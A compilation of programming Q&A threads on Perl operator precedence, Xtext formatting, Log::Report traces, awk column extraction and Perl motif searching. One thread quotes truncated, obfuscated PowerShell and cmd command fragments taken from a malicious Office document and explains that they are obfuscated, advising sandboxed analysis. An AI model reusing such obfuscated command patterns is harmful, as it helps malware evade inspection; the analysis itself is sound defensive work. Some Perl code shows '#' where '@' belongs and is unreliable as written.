Perl operator precendece for a combination of list and unary operators - perl

I came across an odd case, related to operator precendence, I guess. Consider this test program:
use strict;
use warnings;
use Test::More;
my $fn = 'dummy';
ok( ! -e $fn, 'file does not exists' );
ok( not -e $fn, 'file does not exists' );
done_testing();
The output is:
ok 1 - file does not exists
not ok 2
# Failed test at ./p.pl line 10.
1..2
# Looks like you failed 1 test of 2.
The question is: Why does the second test fail? ($fn is assumed known to be non-existent)
See also: List Operator Precedence in Perl.
After reading perlop, my guess is that at least five operators could be involved here:
Terms and List Operators (Leftward)
List Operators (Rightward)
Named Unary Operators
Logical Not
Comma Operator

perl -MO=Deparse shows that your code is interpreted as:
use Test::More;
use warnings;
use strict;
my $fn = 'dummy';
ok !(-e $fn), 'file does not exists';
ok !(-e $fn, 'file does not exists');
done_testing();
-e $fn is false.
But 'file does not exists' is essentially true.
So, the list (-e $fn, 'file does not exists') is true.
Therefore, !(...) is false, and the test fails.

Why does the second test fail?
Because Perl's parser handles ! and not differently. You can see this in Perl's grammar, which is defined in perly.y in the Perl source.
The rule for ! kicks in as soon as the parser encounters a ! followed by a term:
| '!' term /* !$x */
{ $$ = newUNOP(OP_NOT, 0, scalar($2)); }
On the other hand, the rule for not only kicks in when the parser encounters a not followed by a list expression (a list of terms joined by commas*):
| NOTOP listexpr /* not $foo */
{ $$ = newUNOP(OP_NOT, 0, scalar($2)); }
Note that the action for both rules is the same: add a new unary opcode of type OP_NOT to the parse tree. The operand is the second argument (term or listexpr) in scalar context.
* Or a single term, but this has very low precedence.
Tracing the parse
You can see the above rules in action by compiling perl with -DDEBUGGING and running with -Dpv, which turns on debug flags for tokenizing and parsing.
Here's what the parser does with !:
$ perl -Dpv -e'ok(! -e "foo", "bar")'
...
Next token is token '(' (0x1966e98)
Shifting token '(', Entering state 185
Reading a token:
Next token is token '!' (0x1966e98)
Shifting token '!', Entering state 49
Reading a token:
Next token is token UNIOP (0x110)
Shifting token UNIOP, Entering state 39
Reading a token:
Next token is token THING (0x1966e58)
Shifting token THING, Entering state 25
index: 2 3 4 5 6 7 8 9
state: 8 15 103 68 185 49 39 25
token: #1 remember stmtseq amper '(' '!' UNIOP THING
value: 0 22 (Nullop) rv2cv 26635928 26635928 272 const
Reducing stack by rule 184 (line 961), THING -> term
Entering state 128
Reading a token:
Next token is token ',' (0x1966e58)
index: 2 3 4 5 6 7 8 9
state: 8 15 103 68 185 49 39 128
token: #1 remember stmtseq amper '(' '!' UNIOP term
value: 0 22 (Nullop) rv2cv 26635928 26635928 272 const
Reducing stack by rule 199 (line 999), UNIOP term -> term
Entering state 150
Next token is token ',' (0x1966e58)
index: 1 2 3 4 5 6 7 8
state: 1 8 15 103 68 185 49 150
token: GRAMPROG #1 remember stmtseq amper '(' '!' term
value: 0 0 22 (Nullop) rv2cv 26635928 26635928 ftis
Reducing stack by rule 148 (line 829), '!' term -> termunop
Entering state 62
index: 1 2 3 4 5 6 7
state: 1 8 15 103 68 185 62
token: GRAMPROG #1 remember stmtseq amper '(' termunop
value: 0 0 22 (Nullop) rv2cv 26635928 not
...
In other words, the parser reads in
( ! -e "foo"
reduces -e "foo" to a term, and then adds a logical negation opcode to the parse tree. The operand is -e "foo" in scalar context.
Here's what the parser does with not:
$ perl -Dpv -e'ok(not -e "foo", "bar")'
...
Reading a token:
Next token is token '(' (0x26afed8)
Shifting token '(', Entering state 185
Reading a token:
Next token is token NOTOP (0x26afed8)
Shifting token NOTOP, Entering state 48
Reading a token:
Next token is token UNIOP (0x110)
Shifting token UNIOP, Entering state 39
Reading a token:
Next token is token THING (0x26afe98)
Shifting token THING, Entering state 25
index: 2 3 4 5 6 7 8 9
state: 8 15 103 68 185 48 39 25
token: #1 remember stmtseq amper '(' NOTOP UNIOP THING
value: 0 22 (Nullop) rv2cv 40566488 40566488 272 const
Reducing stack by rule 184 (line 961), THING -> term
Entering state 128
Reading a token:
Next token is token ',' (0x26afe98)
index: 2 3 4 5 6 7 8 9
state: 8 15 103 68 185 48 39 128
token: #1 remember stmtseq amper '(' NOTOP UNIOP term
value: 0 22 (Nullop) rv2cv 40566488 40566488 272 const
Reducing stack by rule 199 (line 999), UNIOP term -> term
Entering state 65
Next token is token ',' (0x26afe98)
index: 1 2 3 4 5 6 7 8
state: 1 8 15 103 68 185 48 65
token: GRAMPROG #1 remember stmtseq amper '(' NOTOP term
value: 0 0 22 (Nullop) rv2cv 40566488 40566488 ftis
Reducing stack by rule 105 (line 683), term -> listexpr
Entering state 149
Next token is token ',' (0x26afe98)
Shifting token ',', Entering state 162
Reading a token:
Next token is token THING (0x26afdd8)
Shifting token THING, Entering state 25
index: 3 4 5 6 7 8 9 10
state: 15 103 68 185 48 149 162 25
token: remember stmtseq amper '(' NOTOP listexpr ',' THING
value: 22 (Nullop) rv2cv 40566488 40566488 ftis 40566424 const
Reducing stack by rule 184 (line 961), THING -> term
Entering state 249
Reading a token:
Next token is token ')' (0x26afdd8)
index: 3 4 5 6 7 8 9 10
state: 15 103 68 185 48 149 162 249
token: remember stmtseq amper '(' NOTOP listexpr ',' term
value: 22 (Nullop) rv2cv 40566488 40566488 ftis 40566424 const
Reducing stack by rule 104 (line 678), listexpr ',' term -> listexpr
Entering state 149
Next token is token ')' (0x26afdd8)
index: 1 2 3 4 5 6 7 8
state: 1 8 15 103 68 185 48 149
token: GRAMPROG #1 remember stmtseq amper '(' NOTOP listexpr
value: 0 0 22 (Nullop) rv2cv 40566488 40566488 list
Reducing stack by rule 196 (line 993), NOTOP listexpr -> term
Entering state 65
Next token is token ')' (0x26afdd8)
index: 1 2 3 4 5 6 7
state: 1 8 15 103 68 185 65
token: GRAMPROG #1 remember stmtseq amper '(' term
value: 0 0 22 (Nullop) rv2cv 40566488 not
...
In other words, the parser reads in
( not -e "foo"
reduces -e "foo" to a term, reads in
, "bar"
reduces term, "bar" to a listexpr, and then adds a logical negation opcode to the parse tree. The operand is -e "foo", "bar" in scalar context.
So, even though the opcodes for the two logical negations are the same, their operands are different. You can see this by inspecting the generated parse trees:
$ perl -MO=Concise,-tree -e'ok(! -e "foo", "bar")'
<a>leave[1 ref]-+-<1>enter
|-<2>nextstate(main 1 -e:1)
`-<9>entersub[t1]---ex-list-+-<3>pushmark
|-<6>not---<5>ftis---<4>const(PV "foo")
|-<7>const(PV "bar")
`-ex-rv2cv---<8>gv(*ok)
-e syntax OK
$ perl -MO=Concise,-tree -e'ok(not -e "foo", "bar")'
<c>leave[1 ref]-+-<1>enter
|-<2>nextstate(main 1 -e:1)
`-<b>entersub[t1]---ex-list-+-<3>pushmark
|-<9>not---<8>list-+-<4>pushmark
| |-<6>ftis---<5>const(PV "foo")
| `-<7>const(PV "bar")
`-ex-rv2cv---<a>gv(*ok)
-e syntax OK
With !, the negation acts on the file test:
|-<6>not---<5>ftis
While with not, the negation acts on a list:
|-<9>not---<8>list
You can also dump the parse tree as Perl code using B::Deparse, which shows the same thing in a different format:
$ perl -MO=Deparse,-p -e'ok(! -e "foo", "bar")'
ok((!(-e 'foo')), 'bar');
-e syntax OK
$ perl -MO=Deparse,-p -e'ok(not -e "foo", "bar")'
ok((!((-e 'foo'), 'bar')));
-e syntax OK
With !, the negation acts on the file test:
!(-e 'foo')
While with not, the negation acts on a list:
!((-e 'foo'), 'bar')
And as toolic explained, a list in scalar context evaluates to the last item in the list, giving
ok( ! 'bar' );
where ! 'bar' is falsey.

After rereading the perlop documentation, here is what I believe is going on:
ok( not -e $fn, 'file does not exists' );
Perl parses this statement from left to right. The first thing it encounters is a function call (also called a list operator, if the function is builtin or uses prototypes and operates on lists). The function call ok( ... ). is a described as a TERM in the documentation:
A TERM has the highest precedence in Perl. They include variables,
quote and quote-like operators, any expression in parentheses, and any
function whose arguments are parenthesized.
A list operator (not accurately defined in the perlop page, but briefly mentioned in the perlsub page) is also regarded as a TERM if followed by parenthesis. The perlop says:
If any list operator (print(), etc.) or any unary operator (chdir(),
etc.) is followed by a left parenthesis as the next token, the
operator and arguments within parentheses are taken to be of highest
precedence, just like a normal function call.
Now the parser continues with the expression not -e $fn, 'file does not exists'. That is, it must resolve the arguments to the ok function.
The first thing it encounters here is the not operator. The documentation says:
Unary "not" returns the logical negation of the expression to its
right. It's the equivalent of "!" except for the very low precedence.
Then it must determine "the expression to its right". Here, the parser finds the file test operator -e. The documentation says:
Regarding precedence, the filetest operators, like -f , -M , etc. are
treated like named unary operators, but they don't follow this
functional parenthesis rule. That means, for example, that
-f($file).".bak" is equivalent to -f "$file.bak" .
and
The various named unary operators are treated as functions with one
argument, with optional parentheses.
Now the unary operators (without a following parenthesis) have higher precendence than the not operator, so the parser continues, trying to determine the argument of the -e operator. It now encounters a new TERM, (we are now considering this expression: $fn, 'file does not exists' ). The TERM is $fn and since TERMs have the highest precedence, it is evaluated immediately. Then it continues to the comma operator. Since the comma operator has lower precedence than the filetest operator, and the filetest operator is unary (only takes a single argument), the parser decides it is finished with the argument of the filetest operator and evaluates -e $fn. Then it proceeds with the comma:
Binary "," is the comma operator. In scalar context it evaluates its
left argument, throws that value away, then evaluates its right
argument and returns that value. This is just like C's comma operator.
In list context, it's just the list argument separator, and inserts
both its arguments into the list. These arguments are also evaluated
from left to right.
Since the comma operator has higher precedence than the not operator the parser finds it is still not finished with the argument of not. Instead it discovers that the argument of not is a list (due to the comma operator), it has already evaluated the left argument of the comma operator, -e $fn, and discards that value, and proceeds with the right argument of the comma operator which is the string 'file does not exists'. This is evaluated, and the parser then finds the closing parenthesis ), which means that the argument of not is the latter string. Negating a nonempty string is false.
And finally, the parser finds that the argument to the ok function is false, and runs ok( 0 ).

To relate directly to perlop, all you need to notice is that ! is above , is above not in the table:
right ! ~ \ and unary + and -
...
left , =>
...
right not
That is, the comma binds things together "more tightly" than not does, but "less tightly" than ! does.

Related

Shell or bash commands in office files

While analyzing a doc file, I see some power shell commands such as
Execute Command - params "PowersHeLL & ( $sHELlId[1]+$ShEllID[13]+'X')( [StRinG]::joiN( '' ,([CHaR[]] (62 , 116, 109 ,84 ,119 , 86,88 ,58,39, 58 , 116 ,127 ,109 ,55, 117,120,112, 127 ,121,110,58 ,104,123 , 116,126, 117,119, 33 ,62 , 116 ,78 ,116 , 86, 77 ,95 ,58, 39 ,58 , 116 ,127 , 109
or
Run - params [Function FqLHmmC ([vwPoLiLXwz]): 7 statement(s), 'cmd /c ^f^O^r ; ; /^F , ; " tokens= 2 delims=EFHMN" ; %^h ; ; ^iN ; ( , \' ; ft^^YpE , ; ^| ; fiNd^^str , H^^C \' ; ; ) ; ^do , ; %^h; ; n8ZAmId/vs~*t^#^Y)PUA^ ; ; h0XobFu/^C " , , ( (s^ET ^ ^` ^ =E=6^l2u^\\^h^s\'^y4D^w^XoWJNzL#^b^anGx, ^Ri^{f.P1+Fcme^3^v^0/jB^(krd;^}Z^)-^:tM^Sg^$^pOC)
How these are interpreted? For example, I guess 62 , 116, 109 ,84 are decimal values. However, converting them to ascii are not meaningful. The second one, e.g fiNd^^str , H^^C \' ; ; ) ; ^do sounds like a bash script. But it is not meaningful.
Does that mean, they are obfuscated? or obfuscation is something else?!
How these are interpreted?
Well, these are parsed and interpreted like any other PowerShell code. It's just harder to read for humans. [char]116 is just that. You can type it into PowerShell and find out what it is (ascii code for t).
Does that mean, they are obfuscated?
Yes.
Easiest way to deobfuscate is running the ScriptBlock logging enabled. The eventlog will unveil what actually is being executed. Since you don't know what you are going to execut: Only do this in an isolated sandbox environment!

Xtext 2.8+ formatter, formatting HiddenRegion with comment

I am using Xtext 2.9 formatter and I am trying to format hiddenRegion which contains comment. Here is part of my document region i am trying to format:
Columns: 1:offset 2:length 3:kind 4: text 5:grammarElement
Kind: H=IHiddenRegion S=ISemanticRegion B/E=IEObjectRegion
35 0 H
35 15 S ""xxx::a::b"" Refblock:namespace=Namespace
50 0 H
50 1 S "}" Refblock:RCBRACKET
E Refblock PackageHead:Block=Refblock path:PackageHead/Block=Package'xxx_constants'/head=Model/packages[0]
51 0 H
51 1 S ":" PackageHead:COLON
E PackageHead Package:head=PackageHead path:Package'xxx_constants'/head=Model/packages[0]
52 >>>H "\n " Whitespace:TerminalRule'WS'
"# asd" Comment:TerminalRule'SL_COMMENT'
15 "\n " Whitespace:TerminalRule'WS'<<<
B Error'ASSD' Package:expressions+=Expression path:Package'xxx_constants'/expressions[0]=Model/packages[0]
67 5 S "error" Error:'error'
72 1 H " " Whitespace:TerminalRule'WS'
and corresponding part of the grammar
Model:
{Model}
(packages+=Package)*;
Expression:
Error | Warning | Enum | Text;
Package:
{Package}
'package' name=Name head=PackageHead
(BEGIN
(imports+=Import)*
(expressions+=Expression)*
END)?;
Error:
{Error}
('error') name=ENAME parameter=Parameter COLON
(BEGIN
(expressions+=Estatement)+
END)?;
PackageHead:
Block=Refblock COLON;
Problem is that when i try prepend some characters before error keyword
for example
error.regionFor.keyword('error').prepend[setSpace("\n ")]
This indentation is prepended before the comment and not behind it. This results into improper formatting in case of single line comment before the 'error' keyword.
To provide more clarity, here is example code from my grammar and description of desired behavior:
package xxx_constants {namespace="xxx::a::b"}:
# asd
error ASSD {0}:
Hello {0,world}
This is expected result: (one space to the left)
package xxx_constants {namespace="xxx::a::b"}:
# asd
error ASSD {0}:
Hello {0,world}
and this is the actual result with prepend method
package xxx_constants {namespace="xxx::a::b"}:
# asd
error ASSD {0}:
Hello {0,world}
As the document structure says, the HiddenRegion is in this case is the statement:
# asd
error
How can i prepend my characters directly before the keyword 'error' and not before the comment? Thanks.
I assume you're creating an indentation-sensitive language, because you're explicitly calling BEGIN and END.
For indentation-sensitive language my answer is: You'll want to overwrite
org.eclipse.xtext.formatting2.internal.HiddenRegionReplacer.applyHiddenRegionFormatting(List<ITextReplacer>)
The methods append[] and prepend[] you're using are agnostic to comments and at a later time applyHiddenRegionFormatting() is called to decide how that formatting is weaved between comments.
To make Xtext use your own subclass of HiddenRegionReplacer, overwrite
org.eclipse.xtext.formatting2.AbstractFormatter2.createHiddenRegionReplacer(IHiddenRegion, IHiddenRegionFormatting)
For languages that do not do whitespace-sensitive lexing/parsing (that's the default) the answer is to not call setSpace() to create indentation or line-wraps.
Instead, do
pkg.interior[indent]
pkg.regionFor.keyword(":").append[newLine]
pkg.append[newLine]

Displaying human-readable text in perl Log::Report stack traces

A library that I'm using XML::Compile::Translate::Reader calls Log::Report's error method
or error __x"data for element or block starting with `{tag}' missing at {path}"
, tag => $label, path => $path, _class => 'misfit';
As I've got Log::Report set to debug mode, it returns a stack trace for an error.
[11 07 2014 22:17:39] [2804] error: data for element or block starting with `MSISDN' missing at {http://www.sigvalue.com/acc}TA
at /usr/local/share/perl5/XML/Compile/Translate/Reader.pm line 476
Log::Report::error("Log::Report::Message=HASH(0x2871cf8)") at /usr/local/share/perl5/XML/Compile/Translate/Reader.pm line 476
<snip>
XML::Compile::SOAP::Daemon::LWPutil::lwp_run_request("HTTP::Request=HASH(0x2882858)", "CODE(0x231ba38)", "HTTP::Daemon::ClientConn::SSL=GLOB(0x231b9c0)", undef) at /usr/local/share/perl5/XML/Compile/SOAP/Daemon/LWPutil.pm line 95
Any::Daemon::run("XML::Compile::SOAP::Daemon::AnyDaemon=HASH(0x7a3168)", "child_task", "CODE(0x2548128)", "max_childs", 36, "background", 1) at /usr/local/share/perl5/XML/Compile/SOAP/Daemon/AnyDaemon.pm line 75
XML::Compile::SOAP::Daemon::AnyDaemon::_run("XML::Compile::SOAP::Daemon::AnyDaemon=HASH(0x7a3168)", "HASH(0x18dda00)") at /usr/local/share/perl5/XML/Compile/SOAP/Daemon.pm line 99
(eval)("XML::Compile::SOAP::Daemon::AnyDaemon=HASH(0x7a3168)", "HASH(0x18dda00)") at /usr/local/share/perl5/XML/Compile/SOAP/Daemon.pm line 94
XML::Compile::SOAP::Daemon::run("XML::Compile::SOAP::Daemon::AnyDaemon=HASH(0x7a3168)", "name", "rizserver.pl", "background", 1, "max_childs", 36, "socket", [7 more]) at ./rizserver.pl line 95
There is lots of juicy data in those HASH, SCALAR, GLOB, and other elements that I want to get logged; as we are having trouble logging the original request in case it doesn't match.
I've explored using
Some leads that I don't know how to use are using Log::Dispatch, or some sort of Filter on Log::Report; but in the end, all I really want is to apply Data::Dumper to those elements.

AWK - filter file with not equal fields

I've been trying to pull a field from a row in a file although each row may have plus or minus 2 or 3 fields per row. They aren't always equal in the number of fields per row.
Here is a snippet:
A orarpp 45286124 1 1 0 20 60 Nov 25 9-16:42:32 01:04:58 11176 117056 0 - oracleXXX (LOCAL=NO)
A orarpp 45351560 1 1 3 20 61 Nov 30 5-03:54:42 02:24:48 4804 110684 0 - ora_w002_XXX
A orarpp 45548236 1 1 22 20 71 Nov 26 8-19:36:28 00:56:18 10628 116508 0 - oracleXXX (LOCAL=NO)
A orarpp 45679190 1 1 0 20 60 Nov 28 6-23:42:20 00:37:59 10232 116112 0 - oracleXXX (LOCAL=NO)
A orarpp 45744808 1 1 0 20 60 10:52:19 23:08:12 00:04:58 11740 117620 0 - oracleXXX (LOCAL=NO)
A root 45810380 1 1 0 -- 39 Nov 25 9-19:54:34 00:00:00 448 448 0 - garbage
In the case of the first line, I'm interested in 9-16:42:32 and the similar fields for each row.
I've tried to pull it by using ':' as the field separator and then filter from there however, what I am trying to accomplish is to do something if the number before the dash (in the example it's 9) is greater than one.
cat file.txt | grep oracle | awk -F: '{print substr($1, length($1)-5)}'
This is because the number of fields on either side of the actual field I need can be different from line to line.
Definitely not the most efficient but I've been trying to do this with an awk one liner.
Hints or a direction would be appreciated to get me moving again. I am not opposed to doing in a better way than awk.
Thanks.
Maybe cut is the right tool for this job? For example, with your snippet:
$ cut -c 62-71 file.txt
9-16:42:32
5-03:54:42
8-19:36:28
6-23:42:20
23:08:12
9-19:54:34
The arguments tell cut to snip columns (-c) 62 through 71.
For additional processing, you can pipe it to awk.
You can also accomplish the whole thing in awk by accepting entire lines and then using substr to extract the columns you want. For example, this awk command produces the same output as the cut command above:
awk '{ print substr($0, 62, 10) }' file.txt
Whether you create a pipeline or do the processing entirely in awk is at least in part a matter of personal taste / style.
Would this do?
awk -F: '/oracle/ {print substr($0,62,10)}' file.txt
9-16:42:32
8-19:36:28
6-23:42:20
23:08:12
This search for oracle and then print 10 characters starting from position 62
You can grab those identifiers with one of
grep -o '[[:digit:]]\+-[[:digit:]]\{2\}:[[:digit:]]\{2\}:[[:digit:]]\{2\}'
grep -oP '\d+-\d\d:\d\d:\d\d' # GNU grep
It sounds like you want to do something with the lines, not just find the ids. Please elaborate.
Using GNU awk:
gawk --re-interval '
/oracle/ && \
match($0, /([[:digit:]]+)-([[:digit:]]{2}:){2}[[:digit:]]{2}/, a) && \
a[1]>1 {
# do something with the matching line
print
}
' file

How can I searching for different variants of bioinformatics motifs in string, using Perl?

I have a program output with one tandem repeat in different variants. Is it possible to search (in a string) for the motif and to tell the program to find all variants with maximum "3" mismatches/insertions/deletions?
I will take a crack at this with the very limited information supplied.
First, a short friendly editorial:
<editorial>
Please learn how to ask a good question and how to be precise.
At a minimum, please:
Refrain from domain specific jargon such as "motif" and "tandem repeat" and "base pairs" without providing links or precise definitions;
Say what the goal is and what you have done so far;
Important: Provide clear examples of input and desired output.
It is not helpful to potential helpers on SO have to have to play 20 questions in comments to try and understand your question! I spent more time trying to figure out what you were asking than answering it.
</editorial>
The following program generates a string of 2 character pairs 5,428 pairs long in an array of 1,000 elements long. I realize it is more likely that you will be reading these from a file, but this is just an example. Obviously you would replace the random strings with your actual data from whatever source.
I do not know if 'AT','CG','TC','CA','TG','GC','GG' that I used are legitimate base pair combinations or not. (I slept through biology...) Just edit the map block pairs to legitimate pairs and change the 7 to the number of pairs if you want to generate legitimate random strings for testing.
If the substring at the offset point is 3 differences or less, the array element (a scalar value) is stored in an anonymous array in the value part of a hash. The key part of the hash is the substring that is a near match. Rather than array elements, the values could be file names, Perl data references or other relevant references you want to associate with your motif.
While I have just looked at character by character differences between the strings, you can put any specific logic that you need to look at by replacing the line foreach my $j (0..$#a1) { $diffs++ unless ($a1[$j] eq $a2[$j]); } with the comparison logic that works for your problem. I do not know how mismatches/insertions/deletions are represented in your string, so I leave that as an exercise to the reader. Perhaps Algorithm::Diff or String::Diff from CPAN?
It is easy to modify this program to have keyboard input for $target and $offset or have the string searched beginning to end rather than several strings at a fixed offset. Once again: it was not really clear what your goal is...
use strict; use warnings;
my #bps;
push(#bps,join('',map { ('AT','CG','TC','CA','TG','GC','GG')[rand 7] }
0..5428)) for(1..1_000);
my $len=length($bps[0]);
my $s_count= scalar #bps;
print "$s_count random strings generated $len characters long\n" ;
my $target="CGTCGCACAG";
my $offset=832;
my $nlen=length $target;
my %HoA;
my $diffs=0;
my #a2=split(//, $target);
substr($bps[-1], $offset, $nlen)=$target; #guarantee 1 match
substr($bps[-2], $offset, $nlen)="CATGGCACGG"; #anja example
foreach my $i (0..$#bps) {
my $cand=substr($bps[$i], $offset, $nlen);
my #a1=split(//, $cand);
$diffs=0;
foreach my $j (0..$#a1) { $diffs++ unless ($a1[$j] eq $a2[$j]); }
next if $diffs > 3;
push (#{$HoA{$cand}}, $i);
}
foreach my $hit (keys %HoA) {
my #a1=split(//, $hit);
$diffs=0;
my $ds="";
foreach my $j (0..$#a1) {
if($a1[$j] eq $a2[$j]) {
$ds.=" ";
} else {
$diffs++;
$ds.=$a1[$j];
}
}
print "Target: $target\n",
"Candidate: $hit\n",
"Differences: $ds $diffs differences\n",
"Array element: ";
foreach (#{$HoA{$hit}}) {
print "$_ " ;
}
print "\n\n";
}
Output:
1000 random strings generated 10858 characters long
Target: CGTCGCACAG
Candidate: CGTCGCACAG
Differences: 0 differences
Array element: 999
Target: CGTCGCACAG
Candidate: CGTCGCCGCG
Differences: CGC 3 differences
Array element: 696
Target: CGTCGCACAG
Candidate: CGTCGCCGAT
Differences: CG T 3 differences
Array element: 851
Target: CGTCGCACAG
Candidate: CGTCGCATGG
Differences: TG 2 differences
Array element: 986
Target: CGTCGCACAG
Candidate: CATGGCACGG
Differences: A G G 3 differences
Array element: 998
..several cut out..
Target: CGTCGCACAG
Candidate: CGTCGCTCCA
Differences: T CA 3 differences
Array element: 568 926
I believe that there are routines for this sort of thing in BioPerl.
In any case, you might get better answers if you asked this over at BioStar, the bioinformatics stack exchange.
When I was in my first couple years of learning perl, I wrote what I now consider to be a very inefficient (but functional) tandem repeat finder (which used to be available on my old job's company website) called tandyman. I wrote a fuzzy version of it a couple years later called cottonTandy. If I were to re-write it today, I would use hashes for a global search (given the allowed mistakes) and utilize pattern matching for a local search.
Here's an example of how you use it:
#!/usr/bin/perl
use Tandyman;
$sequence = "ATGCATCGTAGCGTTCAGTCGGCATCTATCTGACGTACTCTTACTGCATGAGTCTAGCTGTACTACGTACGAGCTGAGCAGCGTACgTG";
my $tandy = Tandyman->new(\$sequence,'n'); #Can't believe I coded it to take a scalar reference! Prob. fresh out of a cpp class when I wrote it.
$tandy->SetParams(4,2,3,3,4);
#The parameters are, in order:
# repeat unit size
# min number of repeat units to require a hit
# allowed mistakes per unit (an upper bound for "mistake concentration")
# allowed mistakes per window (a lower bound for "mistake concentration")
# number of units in a "window"
while(#repeat_info = $tandy->FindRepeat())
{print(join("\t",#repeat_info),"\n")}
The output of this test looks like this (and takes a horrendous 11 seconds to run):
25 32 TCTA 2 0.87 TCTA TCTG
58 72 CGTA 4 0.81 CTGTA CTA CGTA CGA
82 89 CGTA 2 0.87 CGTA CGTG
45 51 TGCA 2 0.87 TGCA TGA
65 72 ACGA 2 0.87 ACGT ACGA
23 29 CTAT 2 0.87 CAT CTAT
36 45 TACT 3 0.83 TACT CT TACT
24 31 ATCT 2 1 ATCT ATCT
51 59 AGCT 2 0.87 AGTCT AGCT
33 39 ACGT 2 0.87 ACGT ACT
62 72 ACGT 3 0.83 ACT ACGT ACGA
80 88 ACGT 2 0.87 AGCGT ACGT
81 88 GCGT 2 0.87 GCGT ACGT
63 70 CTAC 2 0.87 CTAC GTAC
32 38 GTAC 2 0.87 GAC GTAC
60 74 GTAC 4 0.81 GTAC TAC GTAC GAGC
23 30 CATC 2 0.87 CATC TATC
71 82 GAGC 3 0.83 GAGC TGAGC AGC
1 7 ATGC 2 0.87 ATGC ATC
54 60 CTAG 2 0.87 CTAG CTG
15 22 TCAG 2 0.87 TCAG TCGG
70 81 CGAG 3 0.83 CGAG CTGAG CAG
44 50 CATG 2 0.87 CTG CATG
25 32 TCTG 2 0.87 TCTA TCTG
82 89 CGTG 2 0.87 CGTA CGTG
55 73 TACG 5 0.75 TAGCTG TAC TACG TACG AG
69 83 AGCG 4 0.81 ACG AGCTG AGC AGCG
15 22 TCGG 2 0.87 TCAG TCGG
As you can see, it allows indels and SNPs. The columns are, in order:
Start position
Stop position
Consensus sequence
The number of units found
A quality metric out of 1
The repeat units separated by spaces
Note, that it's easy to supply parameters (as you can see from the output above) that will output junk/insignificant "repeats", but if you know how to supply good params, it can find what you set it upon finding.
Unfortunately, the package is not publicly available. I never bothered to make it available since it's so slow and not amenable to even prokaryotic-sized genome searches (though it would be workable for individual genes). In my novice coding days, I had started to add a feature to take a "state" as input so that I could run it on sections of a sequence in parallel and I never finished that once I learned hashes would make it so much faster. By that point, I had moved on to other projects. But if it would suit your needs, message me, I can email you a copy.
It's just shy of 1000 lines of code, but it has lots of bells & whistles, such as the allowance of IUPAC ambiguity codes (BDHVRYKMSWN). It works for both amino acids and nucleic acids. It filters out internal repeats (e.g. does not report TTTT or ATAT as 4nt consensuses).